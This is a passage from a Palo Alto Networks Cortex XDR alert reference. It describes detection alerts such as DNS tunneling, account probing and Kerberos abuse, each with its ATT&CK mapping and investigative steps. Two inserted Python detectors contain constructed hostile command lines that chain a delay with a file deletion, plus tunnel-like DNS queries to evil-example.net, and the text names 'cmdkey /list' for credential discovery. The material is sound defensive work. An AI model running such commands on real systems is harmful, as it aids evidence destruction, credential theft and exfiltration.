Cortex XDR™ Analytics Alert Reference

paloaltonetworks.com/documentation
Contact Information
Corporate Headquarters:
Palo Alto Networks
3000 Tannery Way
Santa Clara, CA 95054
www.paloaltonetworks.com/company/contact-support

About the Documentation


• For the most recent version of this guide or for access to related documentation, visit the Technical Documentation portal www.paloaltonetworks.com/documentation.
• To search for a specific topic, go to our search page www.paloaltonetworks.com/documentation/document-search.html.
• Have feedback or questions for us? Leave a comment on any page in the portal, or write to us at [email protected].

Copyright
Palo Alto Networks, Inc.
www.paloaltonetworks.com

© 2021 Palo Alto Networks, Inc. Palo Alto Networks is a registered trademark of Palo Alto Networks. A list of our trademarks can be found at www.paloaltonetworks.com/company/trademarks.html. All other marks mentioned herein may be trademarks of their respective companies.

Last Revised
July 7, 2021

2 CORTEX XDR™ ANALYTICS ALERT REFERENCE |


Table of Contents
Cortex XDR Analytics Alert Reference..........................................................7
Analytics Alerts by Required Data Source......................................................................................... 11
A disabled user attempted to authenticate via SSO........................................................................ 19
A disabled user attempted to log in.....................................................................................................20
A rare disabled user attempted to log in............................................................................................21
Account probing........................................................................................................................................ 22
Authentication Attempt From a Dormant Account......................................................................... 23
Bronze-Bit exploit..................................................................................................................................... 24
Cached credentials discovery with cmdkey....................................................................................... 25
Commonly abused AutoIT script connects to an external domain............................................... 26
Commonly abused AutoIT script drops an executable file to disk............................................... 27
DNS Tunneling...........................................................................................................................................28
Delayed Deletion of Files....................................................................................................................... 30
Discovery of host users via WMIC...................................................................................................... 31
Domain federation settings have been modified..............................................................................32
Execution of a password brute-force tool..........................................................................................33
Execution of renamed lolbin.................................................................................................................. 34
External cloud storage access with unusual user agent.................................................................. 35
Failed Connections................................................................................................................................... 36
Failed DNS..................................................................................................................................................37
Failed Login For Locked-Out Account................................................................................................ 39
Failed Login For a Long Username With Special Characters......................................................... 40
First SSO access from ASN for user....................................................................................................41
First SSO access from ASN in organization....................................................................................... 42
First connection from a country in organization...............................................................................43
High Connection Rate............................................................................................................................. 44
Impossible traveler....................................................................................................................................46
Interactive local account enumeration................................................................................................ 47
Interactive login by a machine account.............................................................................................. 48
Interactive login by a service account................................................................................................. 49
Kerberos Pre-Auth Failures by Host....................................................................................................50
Kerberos Pre-Auth Failures by User and Host..................................................................................51
Kerberos Traffic from Non-Standard Process................................................................................... 52
Kerberos User Enumeration...................................................................................................................54
LOLBIN connecting to a rare host....................................................................................................... 55
LOLBIN spawned by an Office executable connected to a rare external host.......................... 56
Large Upload (FTP)................................................................................................................................... 57
Large Upload (Generic)............................................................................................................................ 58
Large Upload (HTTPS)............................................................................................................................. 59
Large Upload (SMTP)............................................................................................................................... 60
Login Password Spray..............................................................................................................................61
Login by a dormant user.........................................................................................................................62
MSBuild Makes a Rare Network Connection.................................................................................... 63
Microsoft Office Process Spawning a Suspicious One-Liner......................................................... 64
Microsoft Office process spawns a commonly abused process....................................................65
Mshta.exe launched with suspicious arguments...............................................................................66
Multiple Rare Process Executions in Organization...........................................................................67
Multiple Weakly-Encrypted Kerberos Tickets Received.................................................................68
Multiple discovery commands............................................................................................................... 69
NTLM Brute Force on a Service Account.......................................................................................... 70



NTLM Hash Harvesting...........................................................................................................................71
Network sniffing via command-line tool.............................................................................................72
New Administrative Behavior................................................................................................................ 73
Port Scan..................................................................................................................................................... 74
Possible DCShadow attempt..................................................................................................................75
Possible DCSync Attempt.......................................................................................................................76
Possible Kerberoasting without SPNs................................................................................................. 77
Possible Search For Password Files..................................................................................................... 78
Possible compromised machine account............................................................................................ 79
PowerShell Initiates a Network Connection to GitHub.................................................................. 80
PowerShell runs suspicious base64-encoded commands............................................................... 81
RDP Connection to localhost................................................................................................................ 82
Random-Looking Domain Names......................................................................................................... 83
Rare SSH Session...................................................................................................................................... 85
Rare Unsigned Process Spawned by Office Process Under Suspicious Directory.................... 86
Rare WinRM Session............................................................................................................................... 87
Rare process execution by user............................................................................................................ 88
Rare process execution in organization.............................................................................................. 89
Recurring access to rare IP.................................................................................................................... 90
Recurring access to rare domain categorized as malicious.............................................................91
Recurring rare domain access from an unsigned process...............................................................92
Recurring rare domain access to dynamic DNS domain................................................................. 93
Remote account enumeration............................................................................................................... 94
Remote command execution via wmic.exe........................................................................................ 95
Remote service command execution from an uncommon source................................................ 96
Remote service start from an uncommon source.............................................................................97
Reverse SSH tunnel to external domain/ip........................................................................................98
SMB Traffic from Non-Standard Process........................................................................................... 99
SSO authentication by a machine account...................................................................................... 101
SSO authentication by a service account.........................................................................................102
SSO with abnormal operating system...............................................................................................103
SSO with new operating system........................................................................................................ 104
Scrcons.exe Rare Child Process.......................................................................................................... 105
Script Connecting to Rare External Host......................................................................................... 106
Spam Bot Traffic.....................................................................................................................................107
Sudoedit Brute force attempt............................................................................................................. 108
Suspicious PowerShell Command Line............................................................................................. 109
Suspicious PowerShell Enumeration of Running Processes.........................................................110
Suspicious Process Spawned by Adobe Reader............................................................................. 111
Suspicious Process Spawned by wininit.exe....................................................................................112
Suspicious RunOnce Parent Process................................................................................................. 113
Suspicious SSO access from ASN...................................................................................................... 114
Suspicious disablement of the Windows Firewall..........................................................................115
Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin................................116
Suspicious process accessed a site masquerading as Google......................................................117
Suspicious process execution by scheduled task........................................................................... 118
TGT reuse from different hosts (pass the ticket)........................................................................... 119
UNIX LOLBIN connecting to a rare host......................................................................................... 120
Uncommon ARP cache listing via arp.exe........................................................................................121
Uncommon IP Configuration Listing via ipconfig.exe....................................................................122
Uncommon Service Create/Config.................................................................................................... 123
Uncommon local scheduled task creation via schtasks.exe......................................................... 124
Uncommon net group execution........................................................................................................125
Uncommon remote scheduled task creation...................................................................................126
Uncommon remote service start via sc.exe.....................................................................................127

Uncommon routing table listing via route.exe................................................................................ 128
Uncommon user management via net.exe.......................................................................................129
Unicode RTL Override Character....................................................................................................... 130
Unusual Lolbins Process Spawned by InstallUtil.exe.....................................................................131
Unusual process accessed the PowerShell history file................................................................. 132
Unusual weak authentication by user............................................................................................... 133
Unverified domain added to Azure AD............................................................................................ 134
User attempted to connect from a suspicious country................................................................ 135
User connected from a new country................................................................................................ 136
User successfully connected from a suspicious country.............................................................. 137
Vulnerable driver loaded...................................................................................................................... 138
Weakly-Encrypted Kerberos Ticket Requested.............................................................................. 139
Windows Installer exploitation for local privilege escalation...................................................... 140
WmiPrvSe.exe Rare Child Command Line....................................................................................... 141
Wsmprovhost.exe Rare Child Process.............................................................................................. 142

Cortex XDR Analytics Alert Reference
The Cortex XDR Analytics Alert Reference provides a description of every Cortex XDR
Analytics Alert. Use this reference to understand what an alert means and what you should do
about it.

Analytics Alerts by Required Data Source
The Analytics alerts that Cortex XDR can raise depend on the data sources you integrate with Cortex XDR. For example, if the Cortex XDR agent is your only data source, Cortex XDR raises only the alerts it can detect from agent endpoint data. Some alerts require a combination of data sources before they can be raised. You can also improve the accuracy of some Analytics alerts by adding optional data sources. The following list groups each alert under its required data source; where an alert names optional data sources, adding them increases accuracy.

Required data source: AzureAD, Okta, or PingOne
• A disabled user attempted to authenticate via SSO (optional, for increased accuracy: Palo Alto Networks Firewall Logs, XDR Agent)
• First SSO access from ASN for user
• First SSO access from ASN in organization
• First connection from a country in organization
• Impossible traveler (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• SSO authentication by a machine account
• SSO authentication by a service account
• Suspicious SSO access from ASN
• User attempted to connect from a suspicious country
• User connected from a new country
• User successfully connected from a suspicious country (optional, for increased accuracy: Palo Alto Networks Firewall Logs)

Required data source: XDR Agent
• A disabled user attempted to log in
• A rare disabled user attempted to log in
• Account probing
• Cached credentials discovery with cmdkey
• Commonly abused AutoIT script drops an executable file to disk
• Delayed Deletion of Files
• Discovery of host users via WMIC
• Execution of a password brute-force tool
• Execution of renamed lolbin
• Failed Connections
• Interactive local account enumeration
• Interactive login by a machine account
• Interactive login by a service account
• Kerberos Traffic from Non-Standard Process (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• LOLBIN connecting to a rare host (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• LOLBIN spawned by an Office executable connected to a rare external host
• Large Upload (Generic)
• Login Password Spray
• Login by a dormant user
• MSBuild Makes a Rare Network Connection (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Microsoft Office Process Spawning a Suspicious One-Liner
• Microsoft Office process spawns a commonly abused process
• Mshta.exe launched with suspicious arguments
• Multiple Rare Process Executions in Organization
• Multiple discovery commands
• Network sniffing via command-line tool
• Possible Search For Password Files
• PowerShell Initiates a Network Connection to GitHub (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• PowerShell runs suspicious base64-encoded commands
• RDP Connection to localhost (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Rare SSH Session (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Rare Unsigned Process Spawned by Office Process Under Suspicious Directory
• Rare WinRM Session (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Rare process execution by user
• Rare process execution in organization
• Recurring access to rare IP
• Recurring rare domain access from an unsigned process
• Remote account enumeration
• Remote command execution via wmic.exe
• Remote service command execution from an uncommon source
• Remote service start from an uncommon source
• Reverse SSH tunnel to external domain/ip (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• SMB Traffic from Non-Standard Process (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Scrcons.exe Rare Child Process
• Script Connecting to Rare External Host (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• Sudoedit Brute force attempt
• Suspicious PowerShell Command Line
• Suspicious PowerShell Enumeration of Running Processes
• Suspicious Process Spawned by Adobe Reader
• Suspicious Process Spawned by wininit.exe
• Suspicious RunOnce Parent Process
• Suspicious disablement of the Windows Firewall
• Suspicious dump of ntds.dit using Shadow Copy with ntdsutil/vssadmin
• Suspicious process accessed a site masquerading as Google
• Suspicious process execution by scheduled task
• UNIX LOLBIN connecting to a rare host
• Uncommon ARP cache listing via arp.exe
• Uncommon IP Configuration Listing via ipconfig.exe
• Uncommon Service Create/Config
• Uncommon local scheduled task creation via schtasks.exe
• Uncommon net group execution
• Uncommon remote scheduled task creation
• Uncommon remote service start via sc.exe
• Uncommon routing table listing via route.exe
• Uncommon user management via net.exe
• Unicode RTL Override Character
• Unusual Lolbins Process Spawned by InstallUtil.exe
• Unusual process accessed the PowerShell history file
• Unusual weak authentication by user
• Vulnerable driver loaded
• Windows Installer exploitation for local privilege escalation
• WmiPrvSe.exe Rare Child Command Line
• Wsmprovhost.exe Rare Child Process

Required data source: Palo Alto Networks Firewall Logs or XDR Agent
• Authentication Attempt From a Dormant Account
• Bronze-Bit exploit
• Failed Login For Locked-Out Account
• Failed Login For a Long Username With Special Characters
• Kerberos Pre-Auth Failures by Host
• Kerberos Pre-Auth Failures by User and Host
• Kerberos User Enumeration
• Large Upload (FTP)
• Large Upload (HTTPS)
• Large Upload (SMTP)
• Multiple Weakly-Encrypted Kerberos Tickets Received
• Possible Kerberoasting without SPNs
• Possible compromised machine account
• Spam Bot Traffic
• TGT reuse from different hosts (pass the ticket)
• Weakly-Encrypted Kerberos Ticket Requested

Required data source: Palo Alto Networks Firewall Logs
• Commonly abused AutoIT script connects to an external domain (optional, for increased accuracy: XDR Agent)
• DNS Tunneling (optional, for increased accuracy: XDR Agent)
• Failed Connections
• Failed DNS (optional, for increased accuracy: XDR Agent)
• LOLBIN spawned by an Office executable connected to a rare external host
• Large Upload (Generic)
• Random-Looking Domain Names (optional, for increased accuracy: XDR Agent)
• Recurring access to rare IP
• Recurring access to rare domain categorized as malicious (optional, for increased accuracy: XDR Agent)
• Recurring rare domain access from an unsigned process
• Recurring rare domain access to dynamic DNS domain (optional, for increased accuracy: XDR Agent)
• Suspicious process accessed a site masquerading as Google
• UNIX LOLBIN connecting to a rare host

Required data source: Azure Audit Log
• Domain federation settings have been modified
• Unverified domain added to Azure AD

Required data source: Cloud Logs
• External cloud storage access with unusual user agent

Required data source: XDR Agent, AzureAD, or Okta
• First connection from a country in organization
• Impossible traveler (optional, for increased accuracy: Palo Alto Networks Firewall Logs)
• User attempted to connect from a suspicious country
• User connected from a new country
• User successfully connected from a suspicious country (optional, for increased accuracy: Palo Alto Networks Firewall Logs)

Required data source: Palo Alto Networks Firewall Logs, XDR Agent, Corelight, or Third-Party Firewalls
• High Connection Rate
• NTLM Brute Force on a Service Account
• NTLM Hash Harvesting
• New Administrative Behavior
• Port Scan
• Possible DCShadow attempt
• Possible DCSync Attempt

Required data source: Palo Alto Networks Firewall Logs, XDR Agent, AzureAD, Okta, or PingOne
• NTLM Brute Force on a Service Account
• NTLM Hash Harvesting

Required data source: AzureAD or Okta
• SSO with abnormal operating system (optional, for increased accuracy: XDR Agent)
• SSO with new operating system

18 CORTEX XDR™ ANALYTICS ALERT REFERENCE | Cortex XDR Analytics Alert Reference
© 2021 Palo Alto Networks, Inc.
A disabled user attempted to authenticate via SSO
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: AzureAD, Okta, or PingOne
For increased accuracy, you can also add any of the following optional
data sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A disabled user attempted to authenticate via SSO.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

A disabled user attempted to log in
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Informational

Description
A disabled user attempted to log in.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the authentication was successful.
• Confirm that the activity is benign (e.g. the user was recently enabled by an authorized entity).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

A rare disabled user attempted to log in
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic Initial Access (TA0001)

ATT&CK Technique Valid Accounts: Domain Accounts (T1078.002)

Severity Low

Description
A rare disabled user attempted to log in.

Attacker's Goals
Use an account that was possibly compromised in the past to gain access to the network.

Investigative Actions
• See whether the authentication was successful.
• Confirm that the activity is benign (e.g. the user was recently enabled by an authorized entity).
• Check further actions or attempts by the user.

Account probing
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Hour

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules Identity Analytics

ATT&CK Tactic
• Initial Access (TA0001)
• Credential Access (TA0006)

ATT&CK Technique
• Valid Accounts (T1078)
• Brute Force (T1110)

Severity Low

Description
A user failed to log in to multiple hosts it never accessed before in a short amount of time. This may indicate
the account is compromised and an attacker is probing for a host it can access with those credentials.

Attacker's Goals
Gain access to hosts by using stolen user-account credentials.

Investigative Actions
Check if the user account was compromised, and which resources it could access.

Authentication Attempt From a Dormant Account
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 31 Days

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Valid Accounts (T1078)

Severity Low

Description
A dormant user account tried to authenticate to a service using a TGS, after having been unused for a year
or more. This may indicate the account is misused by an attacker.

Attacker's Goals
Use a compromised user account which has not been used in a long while, and is therefore less likely to be
noticed.

Investigative Actions
• See whether the service authentication was successful.
• Confirm that the activity is benign (e.g. the user returned from a long leave of absence).
• Check whether you have issues with your Directory Sync Services failing to sync data from Active
Directory.

Bronze-Bit exploit
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combination of data
sources: Palo Alto Networks Firewall Logs or XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique User Execution (T1204)

Severity High

Description
A forwardable Kerberos ticket for delegation of a Protected User was observed.

Attacker's Goals
Obtain a Kerberos ticket for a protected user in order to move laterally.

Investigative Actions
• Check the initiating service account delegation privileges.
• Check the delegated account credentials and if it has high privileges.
• Check the ticket destination to verify whether it is a sensitive asset.

Cached credentials discovery with cmdkey
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic
• Credential Access (TA0006)
• Discovery (TA0007)

ATT&CK Technique
• OS Credential Dumping (T1003)
• Account Discovery (T1087)

Severity Low

Description
Cmdkey is a built-in Windows tool that can cache domain user credentials for use on specific target
machines. Attackers can access cached user credentials using cmdkey /list.

Attacker's Goals
Access cached user credentials.

Investigative Actions
• Check the initiator process for additional suspicious activity.
• Check if the host is a shared host from which multiple users' credentials can be extracted.

Commonly abused AutoIT script connects to an external domain
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Exfiltration (TA0010)

ATT&CK Technique Automated Exfiltration (T1020)

Severity Medium

Description
AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process
context.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process
context.
• Identify the process contacting the remote domain and determine whether the traffic is malicious.

Commonly abused AutoIT script drops an executable file to disk
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Execution (TA0002)

ATT&CK Technique Command and Scripting Interpreter: Windows Command Shell (T1059.003)

Severity Informational

Description
AutoIT scripts have legitimate uses, but are often abused by malware to execute in a signed process context.

Attacker's Goals
Gain code execution on the host and evade security controls.

Investigative Actions
• Check whether the command line executed is benign or normal for the host and/or user performing it.
• Check whether the user in the command line is an administrator or other sensitive account.

DNS Tunneling
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 10 Minutes

Deduplication Period 1 Hour

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic
• Command and Control (TA0011)
• Exfiltration (TA0010)

ATT&CK Technique
• Application Layer Protocol (T1071)
• Exfiltration Over Alternative Protocol (T1048)

Severity Medium

Description
10 KB or more were sent encoded in subdomain names during a 10-minute window. All subdomains
queried were under a single suspicious domain.
DNS tunneling encodes data in DNS queries and responses, allowing an attacker to bypass firewalls and
proxies to reach his or her command and control server, even when HTTP/S traffic is blocked.
The endpoint may be remotely controlled by an attacker, and/or an attacker may have exfiltrated data from
it.

Attacker's Goals
Communicate with malware running on your network to control malware activities, perform software
updates on the malware, or to take inventory of infected machines.

Investigative Actions
• Verify that the source device or process is not an approved security solution.
• Verify if the DNS query types are non-standard. DNS tunnels use uncommon query types that enable
encoding of more data. Examples include: INIT, PRIVATE, NULL, SRV, KEY, and TXT.

• If the affected endpoint is operating Windows, verify that the DNS traffic is coming from svchost.exe
and search for other processes that ran when the alert triggered. In Windows, the DNS requests go
through svchost.exe.
• Verify the responses per DNS query. Many responses per query may indicate a tool being downloaded.
• Verify the destination domain details and compare the number of endpoints in your network that access
the domain over time to see if this is an uncommonly contacted domain.
• Verify the source web-browser traffic to determine whether the process was generated by user action; if the
user did not initiate the traffic, it can be indicative of malicious activity.
• Verify non-DNS traffic to the domain. Any traffic other than DNS queries to the destination domain may
indicate a legitimate domain that is not used solely for command-and-control or data exfiltration.
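The following is an added example, not Palo Alto Networks code, showing how the condition this alert describes (10 KB or more encoded in subdomain labels under one domain inside a 10-minute window, with attention to the uncommon query types listed above) can be checked over DNS query records. The log records, client addresses and the evil-example.net domain are constructed; the parent-domain split is naive and assumes no public-suffix handling.

```python
"""Added example (not Palo Alto Networks code): a minimal DNS-tunneling
detector built on the alert's stated condition, 10 KB or more of data
encoded in subdomain labels under one domain within a 10-minute window,
run over constructed DNS query records."""
from collections import defaultdict
from datetime import datetime, timedelta

# Query types the reference lists as favoured by tunnelling tools.
TUNNEL_QTYPES = {"INIT", "PRIVATE", "NULL", "SRV", "KEY", "TXT"}
BYTES_THRESHOLD = 10 * 1024          # 10 KB, as stated in the alert description
WINDOW = timedelta(minutes=10)       # the alert's 10-minute test window


def registered_domain(fqdn):
    """Naive parent domain: 'x.y.t.example.net' -> 'example.net'.
    Assumption: no public-suffix handling (co.uk etc.); real data needs it."""
    labels = fqdn.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def encoded_bytes(fqdn):
    """Bytes a client could have encoded in the subdomain part of the name,
    i.e. the characters of every label left of the registered domain."""
    labels = fqdn.rstrip(".").lower().split(".")
    return sum(len(label) for label in labels[:-2])


def detect_dns_tunneling(records):
    """records: iterable of (timestamp, src_ip, qname, qtype).

    Returns one finding per (source, domain) pair whose encoded subdomain
    bytes reach BYTES_THRESHOLD inside some 10-minute sliding window."""
    by_pair = defaultdict(list)
    for ts, src, qname, qtype in records:
        key = (src, registered_domain(qname))
        by_pair[key].append((ts, encoded_bytes(qname), qtype.upper()))

    findings = []
    for (src, domain), events in sorted(by_pair.items()):
        events.sort(key=lambda e: e[0])
        uncommon = sorted({q for _, _, q in events if q in TUNNEL_QTYPES})
        start, total = 0, 0
        for ts, nbytes, _ in events:
            total += nbytes
            # Drop events older than WINDOW from the running total.
            while ts - events[start][0] > WINDOW:
                total -= events[start][1]
                start += 1
            if total >= BYTES_THRESHOLD:
                findings.append({"src": src, "domain": domain,
                                 "bytes": total, "uncommon_qtypes": uncommon})
                break
    return findings


def build_sample_records():
    """Constructed sample traffic: one benign client, one tunnel-like client
    and one client that sends the same names too slowly to trip the window."""
    base = datetime(2021, 7, 7, 9, 0, 0)
    records = []
    for i, name in enumerate(["www.example.com", "mail.example.com", "cdn.example.com"]):
        records.append((base + timedelta(seconds=30 * i), "10.0.0.5", name, "A"))
    # Three 50-character labels per query (151 bytes with the 't' label).
    payload = ".".join(["a1b2c3d4e5" * 5] * 3)
    for i in range(70):    # 70 queries, 4 s apart: ~10.3 KB inside 5 minutes
        records.append((base + timedelta(seconds=4 * i), "10.0.0.9",
                        f"{payload}.t.evil-example.net", "TXT"))
    for i in range(70):    # same names, 2 min apart: under 1 KB per window
        records.append((base + timedelta(seconds=120 * i), "10.0.0.12",
                        f"{payload}.t.evil-example.net", "TXT"))
    return records


if __name__ == "__main__":
    for finding in detect_dns_tunneling(build_sample_records()):
        print(finding)
```

The slow client shows why the window matters: the same volume spread over hours never reaches the threshold in any single 10-minute span.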

Delayed Deletion of Files
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Indicator Removal on Host: File Deletion (T1070.004)

Severity Low

Description
A command line deleting files used the timeout or ping commands to delay the file deletion. This is
suspicious, as malware sometimes uses these techniques to cover its tracks.

Attacker's Goals
Evade security controls and possibly cover their tracks.

Investigative Actions
Check whether the executing process is benign, and if this was a desired behavior as part of its normal
execution flow.
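As an added example (not Palo Alto Networks code), the following flags process command lines that chain a ping or timeout delay before a del/erase in the same command, which is the pattern this alert describes. The sample command lines and file paths are constructed; the regular expressions cover cmd.exe syntax only.

```python
"""Added example (not Palo Alto Networks code): flag command lines that
chain a delay (ping -n N or timeout /t N) before a del/erase, the pattern
this alert describes, over constructed process-start command lines."""
import re

# A delay primitive: "ping <host> -n <count>" (any argument order) or
# "timeout [/t] <seconds>". The lazy [^&|]*? keeps the ping match inside
# a single command of the chain.
DELAY_RE = re.compile(
    r"\b(?:ping(?:\.exe)?\b[^&|]*?-n\s+\d+|timeout(?:\.exe)?\s+(?:/t\s+)?\d+)",
    re.IGNORECASE,
)
# A delete that starts a later command in the same chain (&, &&, | or ;).
DELETE_RE = re.compile(r"[&|;]\s*(?:del|erase)\b", re.IGNORECASE)


def is_delayed_deletion(cmdline):
    """True when a delay appears and a del/erase follows it in the chain.
    A delete that precedes the delay is not the pattern and is not flagged."""
    delay = DELAY_RE.search(cmdline)
    if delay is None:
        return False
    return DELETE_RE.search(cmdline, delay.end()) is not None


def flag_delayed_deletions(events):
    """events: iterable of (process_name, cmdline). Returns the flagged ones."""
    return [(name, cmd) for name, cmd in events if is_delayed_deletion(cmd)]


# Constructed sample process events (not real telemetry).
SAMPLE_EVENTS = [
    ("cmd.exe", 'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del /f /q "C:\\Users\\Public\\dropper.exe"'),
    ("cmd.exe", "cmd.exe /c timeout /t 10 & del C:\\Temp\\stage.tmp"),
    ("cmd.exe", "cmd.exe /c ping -n 3 localhost >nul && erase payload.bat"),
    ("cmd.exe", "cmd.exe /c del C:\\Temp\\build.log"),                      # no delay
    ("cmd.exe", "cmd.exe /c ping -n 3 8.8.8.8"),                            # no delete
    ("cmd.exe", "cmd.exe /c del C:\\Temp\\a.tmp & ping -n 5 127.0.0.1"),    # delete precedes delay
]

if __name__ == "__main__":
    for name, cmd in flag_delayed_deletions(SAMPLE_EVENTS):
        print(name, cmd)
```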

Discovery of host users via WMIC
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique System Owner/User Discovery (T1033)

Severity Low

Description
Attackers may use wmic.exe to list the users of a host, and potentially its owner.

Attacker's Goals
Attackers can attempt to use the command to discover host users and enumerate a large amount of host
information.

Investigative Actions
Verify whether the command that was executed is benign or normal for the host and/or user performing it
(for example, it may be an IT script).

Domain federation settings have been modified
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Hour

Required Data Azure Audit Log

Required Detection Modules No module required

ATT&CK Tactic Persistence (TA0003)

ATT&CK Technique Account Manipulation: Additional Cloud Credentials (T1098.001)

Severity Low

Description
A user or application has modified the federation settings on the domain.

Attacker's Goals
An attacker attempts to change Active Directory configuration for persistence or defense evasion.

Investigative Actions
• Check what configuration has been changed.
• Check whether the user changing the configuration is permitted.

Execution of a password brute-force tool
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Credential Access (TA0006)

ATT&CK Technique Brute Force: Password Guessing (T1110.001)

Severity Medium

Description
Attackers may use brute-force techniques to gain access to accounts when usernames and/or passwords
are unknown.

Attacker's Goals
The attacker attempts to gain access to the account or host.

Investigative Actions
• Verify that the commands are executed from a trusted source.
• Audit the victim account or host and verify that they haven't been compromised.

Execution of renamed lolbin
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Defense Evasion (TA0005)

ATT&CK Technique Masquerading (T1036)

Severity Medium

Description
Lolbins can be renamed and run as a way to avoid detection.

Attacker's Goals
Command execution via lolbins and detection avoidance via file rename.

Investigative Actions
Isolate the host and verify if the file is malicious or not.

External cloud storage access with unusual user agent
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period N/A (single event)

Deduplication Period 1 Day

Required Data Cloud Logs

Required Detection Modules

ATT&CK Tactic
• Collection (TA0009)
• Exfiltration (TA0010)

ATT&CK Technique
• Data from Cloud Storage Object (T1530)
• Exfiltration Over Web Service (T1567)

Severity Low

Description
An identity accessed a storage resource using an unusual user agent from an external IP.

Attacker's Goals
Access sensitive storage resources for data abuse and/or exfiltration.

Investigative Actions
Check what type of data was accessed and its classification, which actions were taken, e.g. read/write/
delete and their status (success/failed), and if this user agent was involved with other identities or events.

Failed Connections
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 1 Day

Deduplication Period 1 Day

Required Data Cortex XDR can raise this alert from the following combinations of data
sources:
• Palo Alto Networks Firewall Logs
• XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Discovery (TA0007)

ATT&CK Technique Remote System Discovery (T1018)

Severity Low

Description
The endpoint has failed connections to other endpoints that have been inactive for more than 24 hours,
or that Cortex XDR Analytics has never seen on the network. The endpoint has made an abnormally large
number of these failed connections and/or is attempting to connect to an abnormal mixture of missing or
inactive endpoints.
It is possible that your network has legitimate scanners that could cause a false positive for this alert. Cortex
XDR Analytics attempts to filter these out by checking if a scanner has been active for a long consecutive
period of time. Consequently, if this alert is seen, it represents new activity on your network.
An attacker may be trying to move laterally, or to scan different parts of the network to look for other
endpoints that expose a specific service. Worms also perform a similar activity to automatically infect
additional hosts in the network.

Attacker's Goals
An attacker does not know your network and is exploring it for new or unknown subnets.

Investigative Actions
• Validate that the source is not a sanctioned port scanner.
• Check for suspicious artifacts in the endpoint profile.

Failed DNS
Synopsis

Learning Period 14 Days

Training Period 30 Days

Test Period 2 Hours

Deduplication Period 2 Hours

Required Data Palo Alto Networks Firewall Logs


For increased accuracy, you can also add the following optional data
source: XDR Agent

Required Detection Modules No module required

ATT&CK Tactic Command and Control (TA0011)

ATT&CK Technique Dynamic Resolution: Domain Generation Algorithms (T1568.002)

